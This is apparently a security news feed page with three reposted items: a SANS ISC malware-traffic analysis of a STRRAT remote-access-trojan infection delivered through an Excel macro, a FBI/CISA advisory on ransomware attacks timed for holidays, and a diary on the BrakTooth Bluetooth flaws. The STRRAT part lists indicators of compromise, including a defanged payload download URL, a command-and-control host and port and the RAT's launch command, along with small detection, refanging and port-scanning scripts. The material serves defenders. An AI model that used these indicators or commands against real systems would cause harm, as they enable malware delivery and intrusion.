STRRAT: a Java-based RAT that doesn't care if you have Java, (Wed, Sep 1st)

This post was originally published on this site

Introduction

STRRAT was discovered earlier this year as a Java-based Remote Access Tool (RAT) that does not require a preinstalled Java Runtime Environment (JRE).  It has been distributed through malicious spam (malspam) during 2021.  Today's diary reviews an infection generated using an Excel spreadsheet discovered on Monday, 2021-08-30.

During this infection, STRRAT was installed with its own JRE.  It arrived in a zip archive that contained JRE version 8 update 261, a .jar file for STRRAT, and a command script to run STRRAT using the JRE from the zip archive.


Shown above:  Chain of events for the STRRAT infection on Monday 2021-08-30.

The Excel spreadsheet

This Excel spreadsheet was submitted to bazaar.abuse.ch on Monday 2021-08-30.  It was likely distributed through email, since previously-documented examples like this one arrived that way.


Shown above:  Screenshot of the spreadsheet used for the STRRAT infection.

Initial infection activity

If a victim opens the spreadsheet and enables macros on a vulnerable Windows host, the macro code generates unencrypted HTTP traffic to 54.202.26[.]55.  Testing the spreadsheet in a lab environment, we saw an HTTP GET request that returned approximately 18.7 kB of ASCII symbols with no letters or numbers.


Shown above:  First HTTP GET request and response caused by the Excel macro.
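Responses like this one, made up entirely of printable ASCII symbols with no letters or digits, are unusual enough to flag heuristically. The helper below is an illustrative sketch of such a check (it is a hypothetical detection aid, not part of the macro's actual decoding logic, which was not analyzed here):

```python
def looks_like_symbol_blob(payload: bytes) -> bool:
    """Heuristic: flag HTTP response bodies made up entirely of printable
    ASCII symbols (plus whitespace) with no letters or digits, like the
    first response returned to the Excel macro."""
    if not payload:
        return False
    for b in payload:
        if b in b'\r\n\t ':
            continue  # tolerate whitespace
        # Reject non-printable bytes and any letter or digit.
        if b < 0x21 or b > 0x7e or chr(b).isalnum():
            return False
    return True
```

A sandbox or proxy could apply such a check to HTTP responses fetched by Office processes to surface this kind of staged payload.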

The second HTTP request to the same IP address returned a zip archive that was approximately 72.1 MB.


Shown above:  The second HTTP GET request to 54.202.26[.]55 returned a 72.1 MB zip archive.

The zip archive was saved to a newly-created directory at C:\User (very close in spelling to C:\Users), its contents were extracted, and the saved zip archive was then deleted.


Shown above:  Location the zip archive was saved to on the infected host.
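Directory names one character away from well-known Windows paths, like C:\User here, can be flagged automatically. A hypothetical sketch follows; the KNOWN_DIRS set and the edit-distance-of-one heuristic are illustrative assumptions, not a vetted detection rule:

```python
KNOWN_DIRS = {"Users", "Windows", "Program Files", "ProgramData"}

def is_lookalike(name: str, known=KNOWN_DIRS) -> bool:
    """Flag directory names exactly one edit away from a well-known
    Windows top-level directory (e.g. 'User' vs 'Users'), the trick
    this STRRAT sample used for its install path."""
    def within_one_edit(a: str, b: str) -> bool:
        if a == b:
            return False          # identical names are legitimate
        la, lb = len(a), len(b)
        if abs(la - lb) > 1:
            return False
        if la != lb:
            # try deleting one character from the longer string
            longer, shorter = (a, b) if la > lb else (b, a)
            return any(longer[:i] + longer[i + 1:] == shorter
                       for i in range(len(longer)))
        # same length: allow exactly one substitution
        return sum(x != y for x, y in zip(a, b)) == 1
    return any(within_one_edit(name, k) for k in known)
```

Running this over the top-level directories of C:\ would flag "User" while leaving the legitimate "Users" alone.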


Shown above:  Extracted contents of the zip archive include JRE, a .jar file for STRRAT, and a script to run STRRAT.


Shown above:  Version file shows JRE version 8 update 261, and sys.cmd contains the script to run the STRRAT .jar file.

Infection traffic

RAT-based post-infection traffic is often easy to spot, since many RATs use non-web-based TCP ports.  Furthermore, traffic for the initial zip archive was over unencrypted HTTP.  Finally, we saw HTTPS traffic to legitimate domains from Github and maven.org that appeared to be caused by the infection process.


Shown above:  Traffic from the infection filtered in Wireshark.
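The "non-web TCP port" heuristic mentioned above can be expressed as a trivial filter over flow records. This is a minimal, hypothetical sketch; the port allowlist is an assumption, and real baselines vary per environment:

```python
# Ports that outbound traffic from a typical workstation commonly uses.
COMMON_PORTS = {80, 443, 53, 25, 587, 993, 995, 123}

def suspicious_flows(flows):
    """Given (dst_ip, dst_port) flow records, return those on ports
    outside the usual workstation set -- the kind of traffic that made
    this STRRAT sample (TCP port 1990) easy to spot."""
    return [f for f in flows if f[1] not in COMMON_PORTS]
```

Applied to the flows from this infection, the STRRAT callback to port 1990 stands out immediately while the HTTPS traffic to legitimate domains does not.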


Shown above:  TCP stream of post-infection traffic generated by STRRAT.

Indicators of Compromise (IOCs)

The following malware was retrieved from an infected Windows host:

SHA256 hash: f148e9a2089039a66fa624e1ffff5ddc5ac5190ee9fdef35a0e973725b60fbc9

  • File size: 71,350 bytes
  • File name: purchase order-419617892#..xlsb
  • File description: Excel spreadsheet with macro for STRRAT

SHA256 hash: cd6f28682f90302520ca88ce639c42671a73dc3e6656738e20d2558260c02533

  • File size: 72,050,185 bytes
  • File location: hxxp://54.202.26[.]55/esfsdghfrzeqsdffgfrtsfd.zip
  • File location: C:\User\xxrrffftttb55bb.zip
  • File description: zip archive retrieved by macro from Excel spreadsheet
  • Note: This package contains Java Runtime Environment (JRE) version 8 update 261 and a .jar file for STRRAT

SHA256 hash: 685549196c77e82e6273752a6fe522ee18da8076f0029ad8232c6e0d36853675

  • File size: 222,711 bytes
  • File location: C:\User\x.jar
  • File description: STRRAT .jar file from the above zip archive
  • Run method: CMD.EXE /C C:\User\bin\java.exe -jar C:\User\x.jar

The following traffic occurred on an infected Windows host:

  • 54.202.26[.]55 port 80 – 54.202.26[.]55 – GET /oo
  • 54.202.26[.]55 port 80 – 54.202.26[.]55 – GET /esfsdghfrzeqsdffgfrtsfd.zip
  • port 443 – repo1.maven.org – HTTPS traffic  (not inherently malicious)
  • port 443 – github.com – HTTPS traffic  (not inherently malicious)
  • port 443 – github-releases.githubusercontent.com – HTTPS traffic  (not inherently malicious)
  • DNS query for str-master[.]pw – response: No such name
  • 105.109.211[.]84 port 1990 – idgerowner.duckdns[.]org – TCP traffic generated by STRRAT
  • port 80 – ip-api.com – GET /json/  (not inherently malicious)
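The IOCs above are defanged (hxxp, [.]) for safe handling. A small helper pair for converting between defanged and usable forms, following the defanging conventions used in this diary:

```python
import re

def refang(ioc: str) -> str:
    """Convert defanged indicators (hxxp, [.]) back to their usable
    form, e.g. for loading the IOCs above into a blocklist."""
    ioc = re.sub(r'^hxxp(s?)://', r'http\1://', ioc)
    return ioc.replace('[.]', '.').replace('[:]', ':')

def defang(ioc: str) -> str:
    """Inverse operation, for safely quoting indicators in a report.
    Note: this defangs every dot, including those in URL paths."""
    ioc = re.sub(r'^http(s?)://', r'hxxp\1://', ioc)
    return ioc.replace('.', '[.]')
```

refang() makes the indicators loadable into firewall or proxy blocklists; defang() is the safer form when sharing indicators in email or reports.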

Final words

This specific STRRAT infection was notable because it included JRE version 8 update 261 as part of the infection package.  Including JRE allows this Java-based RAT to run on vulnerable Windows hosts whether or not they have Java installed.

The host I used for testing already had a more recent version of Java installed, but this sample didn't care.  It brought its own copy of the JRE anyway.

Fortunately, default security settings in Windows 10 and Microsoft Office should prevent this particular STRRAT infection chain.

Mass-distribution methods like malspam remain cheap and profitable for cyber criminals, so we expect to see STRRAT and other types of commonly-distributed malware in the coming months.

A pcap of the infection traffic and malware from the infected host can be found here.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-243A: Ransomware Awareness for Holidays and Weekends

This post was originally published on this site

Original release date: August 31, 2021

Summary

Immediate Actions You Can Take Now to Protect Against Ransomware
• Make an offline backup of your data.
• Do not click on suspicious links.
• If you use RDP, secure and monitor it.
• Update your OS and software.
• Use strong passwords.
• Use multi-factor authentication.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends—when offices are normally closed—in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information to provide awareness to be especially diligent in your network defense practices in the run up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.

Click here for a PDF copy of this report.

Threat Overview

Recent Holiday Targeting

Cyber actors have conducted increasingly impactful attacks against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. Cyber criminals, however, may view holidays and weekends—especially holiday weekends—as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.

  • In May 2021, leading into Mother’s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim’s network, they deployed ransomware to encrypt victim data and—as a secondary form of extortion—exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.
  • In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.
  • In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector, compromising implementations of its remote monitoring and management tool and affecting hundreds of organizations, including multiple managed service providers and their customers.

Ransomware Trends

The FBI’s Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received a record 791,790 complaints for all types of internet crime from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in incidents and a 225 percent increase in ransom demands. From January 1 to July 31, 2021, IC3 received 2,084 ransomware complaints with over $16.8 million in losses, a 62 percent increase in reporting and a 20 percent increase in reported losses compared to the same time frame in 2020. These figures include only those victims who provided information to IC3. The following ransomware variants have been the most frequently reported to the FBI in attacks over the last month.

  • Conti
  • PYSA
  • LockBit
  • RansomEXX/Defray777
  • Zeppelin
  • Crysis/Dharma/Phobos
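The year-over-year percentages above can be sanity-checked with simple percent-change arithmetic. Note that the implied 2019 figure below is derived from the stated 69 percent increase, not taken from the advisory itself:

```python
def pct_increase(old: float, new: float) -> float:
    """Percent change from old to new."""
    return (new - old) / old * 100.0

# 791,790 complaints in 2020 are described as a 69 percent increase
# over 2019, implying roughly 791,790 / 1.69 ~ 468,500 complaints in
# 2019 (a derived estimate, not a figure stated in the advisory).
implied_2019 = round(791_790 / 1.69)
```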

The destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA’s Fact Sheet: Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches.) Malicious actors have also added tactics, such as encrypting or deleting system backups—making restoration and recovery more difficult or infeasible for impacted organizations.

Although cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: 

  • Evaluate a victim’s ability to pay a ransom.
  • Evaluate a victim’s incentive to pay a ransom to: 
    • Regain access to their data and/or 
    • Avoid having their sensitive or proprietary data publicly leaked.
  • Gather information for follow-on attacks before deploying ransomware on the victim network.

Threat Hunting

The FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements: understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems.

  • Understand the IT environment’s routine activity and architecture by establishing a baseline. By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. This approach can help an organization remain alert on deviations from normal activity and detect anomalies. Understanding when users log in to the network—and from what location—can assist in identifying anomalies. Understanding the baseline environment—including the normal internal and external traffic—can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.
  • Review data logs. Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include:
    • Numerous failed file modifications,
    • Increased CPU and disk activity,
    • Inability to access certain files, and
    • Unusual network communications.
  • Employ intrusion prevention systems and automated security alerting systems—such as security information event management software, intrusion detection systems, and endpoint detection and response.
  • Deploy honeytokens and alert on their usage to detect lateral movement.
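The behavior-based baselining described above can be prototyped very simply, for example by flagging logins that deviate from a user's historical login hours. The following is a rough sketch; the z-score threshold is an illustrative assumption, and the model deliberately ignores wrap-around at midnight:

```python
from statistics import mean, stdev

def is_anomalous_login(history_hours, new_hour, z_threshold=3.0):
    """Flag a login hour that deviates from a user's baseline by more
    than z_threshold standard deviations. history_hours is a list of
    past login hours (0-23) for one user."""
    if len(history_hours) < 2:
        return False  # not enough data to form a baseline
    mu, sigma = mean(history_hours), stdev(history_hours)
    if sigma == 0:
        return new_hour != mu  # perfectly regular user: any change is odd
    return abs(new_hour - mu) / sigma > z_threshold
```

A user who always logs in around 9 a.m. triggers an alert when a 3 a.m. login appears, which mirrors the advisory's point that anomalous logon times are an early indicator.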

Indicators of suspicious activity that threat hunters should look for include:

  • Unusual inbound and outbound network traffic,
  • Compromise of administrator privileges or escalation of the permissions on an account,
  • Theft of login and password credentials,
  • Substantial increase in database read volume,
  • Geographical irregularities in access and log in patterns,
  • Attempted user activity during anomalous logon times, 
  • Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and
  • Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.

See the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

Cyber Hygiene Services

CISA offers a range of no-cost cyber hygiene services—including vulnerability scanning and ransomware readiness assessments—to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. 

Ransomware Best Practices

The FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to CISA, a local FBI field office, or by filing a report with IC3 at IC3.gov. Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. law, and share information to prevent future attacks.

Information Requested

Upon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: 

  • Recovered executable file(s),
  • Live memory (RAM) capture,
  • Images of infected systems,
  • Malware samples, and
  • Ransom note.

Recommended Mitigations

The FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends. They also recommend IT security personnel subscribe to CISA cybersecurity publications (https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED) and regularly visit the FBI Internet Crime Complaint Center (https://www.ic3.gov/) for the latest alerts. Additionally, the FBI and CISA recommend identifying IT security employees to be available and “on call” during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.

Make an offline backup of your data.

  • Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.
  • Review your organization’s backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.
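Regularly "testing your backups" can include verifying that backed-up files still match checksums recorded at backup time. A minimal sketch follows; the manifest format (relative path to SHA-256 hex digest) is a hypothetical example, not a standard:

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 without loading it all in memory."""
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()

def verify_backup(manifest: dict, root: Path) -> list:
    """Return files whose current hash no longer matches the manifest
    recorded at backup time (missing files are included)."""
    bad = []
    for rel, expected in manifest.items():
        p = root / rel
        if not p.is_file() or sha256_of(p) != expected:
            bad.append(rel)
    return bad
```

Run against an offline copy, an empty result means every file in the manifest is present and unmodified; anything returned deserves investigation before you need the backup in anger.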

Do not click on suspicious links.

  • Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.

If you use RDP—or other potentially risky services—secure and monitor.

  • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.
  • Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.
  • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
  • Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Open document readers in protected viewing modes to help prevent active content from running.
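The account-lockout and RDP-log-monitoring advice above can be prototyped as a simple counter over authentication events. This sketch assumes a simplified (username, success) event format; real Windows Event ID 4625 records carry many more fields, and production lockout is enforced by policy, not a script:

```python
from collections import Counter

# Failed attempts before lockout; stands in for the advisory's
# "specified number of attempts" (an illustrative value).
LOCKOUT_THRESHOLD = 5

def accounts_to_lock(events, threshold=LOCKOUT_THRESHOLD):
    """events: iterable of (username, succeeded) tuples from an RDP
    auth log. Return accounts whose failed-attempt count reached the
    lockout threshold."""
    failures = Counter(user for user, ok in events if not ok)
    return sorted(u for u, n in failures.items() if n >= threshold)
```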

Update your OS and software; scan for vulnerabilities.

  • Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers—as well as software processing internet data, such as web browsers, browser plugins, and document readers—for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.
  • Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.
  • Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA’s free services.)

Use strong passwords.

  • Ensure strong passwords and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.

Use multi-factor authentication.

  • Require multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. 

Secure your network(s): implement segmentation, filter traffic, and scan ports.

  • Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.
  • Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
  • Scan network for open and listening ports and close those that are unnecessary.
  • For companies with employees working remotely, secure home networks—including computing, entertainment, and Internet of Things devices—to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content. 
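The port-scanning recommendation can be approximated with a basic TCP connect scan using only the standard library. Scan only hosts you are authorized to test; a production inventory would use a dedicated scanner such as nmap:

```python
import socket

def open_ports(host: str, ports, timeout: float = 0.5):
    """Return the subset of `ports` accepting TCP connections on host."""
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connected
                found.append(port)
    return found
```

Anything reported open that has no business purpose (e.g., RDP on TCP 3389 facing the internet) is a candidate for closing per the guidance above.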

Secure your user accounts.

  • Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.
  • Regularly audit logs to ensure new accounts are legitimate users.

Have an incident response plan.

  • Create, maintain, and exercise a basic cyber incident response plan that:
    • Includes procedures for response and notification in a ransomware incident and
    • Plans for the possibility of critical systems being inaccessible for a period of time.

Note: for help with developing your plan, review available incident response guidance, such as the Public Power Cyber Incident Response Playbook and the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

If your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.

  • Isolate the infected system. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless.
  • Turn off other computers and devices. Power off and segregate (i.e., remove from the network) the infected computer(s). Power off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering off and segregating infected computers from computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.
  • Secure your backups. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.

Additional Resources

For additional resources related to the prevention and mitigation of ransomware, go to https://www.stopransomware.gov as well as the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide. Stopransomware.gov is the U.S. Government’s new, official one-stop location for resources to tackle ransomware more effectively.

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

Revisions

  • August 31, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

BrakTooth: Impacts, Implications and Next Steps, (Tue, Aug 31st)

This post was originally published on this site

In a previous diary entry, I had written about the increasing trend of Bluetooth vulnerabilities being reported in the recent years [1]. Today, the Automated Systems SEcuriTy (ASSET) Research Group from the Singapore University of Technology and Design (SUTD) revealed the BrakTooth family of vulnerabilities in commercial Bluetooth (BT) Classic stacks for various System-on-Chips (SoC) [2]. In this diary, I will be giving a brief background on BrakTooth, highlight affected products and also discuss next steps affected users/vendors could consider.

The name BrakTooth was coined from the Norwegian word “Brak” (which translates to “crash” in English) and “Tooth” (a hat-tip to the Bluetooth protocol). These vulnerabilities were mainly caused by non-compliance with the Bluetooth Core Specifications and their respective communication protocol layers. 13 Bluetooth devices (Bluetooth Classic versions ranging from Bluetooth 3.0 + HS to Bluetooth 5.2) from 11 different vendors were assessed. 16 new vulnerabilities were discovered, and 20 Common Vulnerabilities and Exposures (CVE) Identifiers (IDs) were assigned (along with another 4 CVE IDs pending assignment from Intel and Qualcomm). On top of the vulnerabilities that were discovered, some devices also displayed anomalous behaviour that deviates from the Bluetooth Core Specifications [3]. The summary of vulnerabilities, anomalies, devices and patch status is outlined in Table 1 below.

Table 1: Patch Status, Vulnerabilities and SDK/Firmware Version of Affected Devices (*Contact vendor to acquire patch)
(Columns: SoC/Module Vendor, Bluetooth SoC, Firmware/SDK Version, CVE/Anomaly (A), Patch Status)

  • Espressif Systems, ESP32, esp-idf-4.4
    • CVE-2021-28135, CVE-2021-28136, CVE-2021-28139
    • A1: Accepts lower Link Manager Protocol (LMP) length
    • Patch status: Available
  • Infineon (Cypress), CYW20735B1, WICED SDK 2.9.0
    • CVE-2021-34145, CVE-2021-34146, CVE-2021-34147, CVE-2021-34148
    • A2: Accepts higher LMP length; A6: Ignore encryption stop
    • Patch status: Available*
  • Bluetrum Technology, AB5301A, Unspecified (LMP Subver. 3)
    • CVE-2021-34150, CVE-2021-31610
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: Available*
  • Intel, AX200, Linux: ibt-12-16.ddc / Windows: 22.40.0
    • 2 CVE IDs pending
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length; A5: Invalid Response
    • Patch status: Patch in progress
  • Qualcomm, WCN3990, crbtfw21.tlv, patch 0x0002
    • 1 CVE ID pending
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length; A4: Ignore Role Switch Reject
    • Patch status: Patch in progress
  • Zhuhai Jieli Technology, AC6366C, fw-AC63_BT_SDK 0.9.0
    • CVE-2021-34143, CVE-2021-34144
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: Patch in progress
  • Zhuhai Jieli Technology, AC6925C, Unspecified (LMP Subver. 12576)
    • CVE-2021-31611, CVE-2021-31613
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: Investigation in progress
  • Zhuhai Jieli Technology, AC6905X, Unspecified (LMP Subver. 12576)
    • CVE-2021-31611, CVE-2021-31612, CVE-2021-31613
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: Investigation in progress
  • Actions Technology, ATS281X, Unspecified (LMP Subver. 5200)
    • CVE-2021-31717, CVE-2021-31785, CVE-2021-31786
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: Investigation in progress
  • Harman International, JX25X, Unspecified (LMP Subver. 5063)
    • CVE-2021-28155
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: Pending
  • Silabs, WT32i, iWRAP 6.3.0 build 1149
    • CVE-2021-31609
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: Pending
  • Qualcomm, CSR8811/CSR8510, v9.1.12.14
    • 1 CVE ID pending
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: No fix
  • Texas Instruments, CC2564C, cc256xc_bt_sp_v1.4
    • CVE-2021-34149
    • A1: Accepts lower LMP length; A2: Accepts higher LMP length
    • Patch status: No fix

The various patch statuses are explained as follows:

  • Available: The vendor has replicated the vulnerability, and a patch is available.
  • Patch in progress: The vendor has successfully replicated the vulnerability, and a patch will be available soon.
  • Investigation in progress: The vendor is currently investigating the security issue, assisted by the researchers.
  • Pending: The vendor has communicated little with the researchers, and the status of any investigation is unclear.
  • No fix: The vendor has successfully replicated the issue but has no plans to release a patch.

Using the BrakTooth family of vulnerabilities, the researchers were able to achieve arbitrary code execution on smart home products that use the ESP32 SoC, cause Denial-of-Service (DoS) conditions on laptops and smartphones, and induce audio products to freeze up. A preliminary examination of products in the Bluetooth listing indicated that over 1,400 product listings were affected [4]. However, because a Bluetooth stack is often shared across many products, there is a high possibility that many other Bluetooth products are affected by BrakTooth. For now, the Proof-of-Concept (PoC) code is available only to Bluetooth semiconductor and module vendors and is embargoed until the end of October 2021, after which it will be released to the public.

How should everyone handle the usage of Bluetooth devices, especially if the devices used are affected by BrakTooth? As a start, one might want to be more aware of one’s surroundings when using Bluetooth. Since BrakTooth is based on the Bluetooth Classic protocol, an adversary would have to be in the radio range of the target to execute the attacks. As such, secured facilities should have a lower risk as compared to public areas (assuming no insiders within secured facilities). Having said that, this could also be a difficult task if an adversary manages to conceal the equipment well, though that would affect the range of Bluetooth connectivity.

For end users, it is highly recommended to check whether the Bluetooth products you currently use appear in Table 1. If patches are available (or you can contact the vendor for a patch), apply them immediately. If a patch is in progress or the vendor is still investigating, it would be worthwhile to watch for anomalous behaviour (such as the inability to re-establish a Bluetooth connection, or audio devices not responding) while Bluetooth is in use. Turn Bluetooth off when it is not actively in use to reduce your attack surface. Keep a close lookout for corresponding patches and update devices when possible. If a device uses an SoC for which no fix is available, it is recommended to stop using it (unless you are prepared to accept the risk of BrakTooth vulnerabilities being exploited). Finally, keep in mind that BrakTooth is not limited to the devices tested by the researchers, as the attacks apply to any Bluetooth Classic implementation; checking the Bluetooth chipset alone is not enough to rule out BrakTooth. To concretely verify whether a Bluetooth device is affected, users could obtain the BrakTooth PoC (when it is released to the public on October 31st) and test the device with it.

Organizations, governments and critical infrastructure may be using affected components as well. If stakeholders are uncertain about the extent of Bluetooth usage and the associated devices, an audit of the devices/components in use should be carried out. Following that, a risk assessment should also be conducted to assess the risk posed by BrakTooth to users or day-to-day operations. Keeping in mind the attack vector, an interim measure could very well be enhanced physical security while affected devices are patched/replaced.

Finally, for Bluetooth SoC or module vendors, it is highly recommended to contact the researchers now for the PoC and test products for BrakTooth vulnerabilities [5]. Although vendors may not be legally obliged to keep their products secure and updated, the growing adoption of Bluetooth for work and health, together with rising interest in Bluetooth vulnerability research, underscores the importance of these issues. In addition, as customers and users become increasingly discerning about the need for their privacy and data to be protected, it is in vendors’ best interests to ensure product security for a continued presence in the market.

The full technical details of BrakTooth can be found here [2] and are also available as a downloadable PDF file [6].

References:
[1] https://isc.sans.edu/diary/27460
[2] https://www.braktooth.com
[3] https://www.bluetooth.com/specifications/bluetooth-core-specification
[4] https://launchstudio.bluetooth.com/Listings/Search
[5] https://poc.braktooth.com
[6] https://asset-group.github.io/disclosures/braktooth/braktooth.pdf

———–
Yee Ching Tok, ISC Handler
Personal Site
Twitter

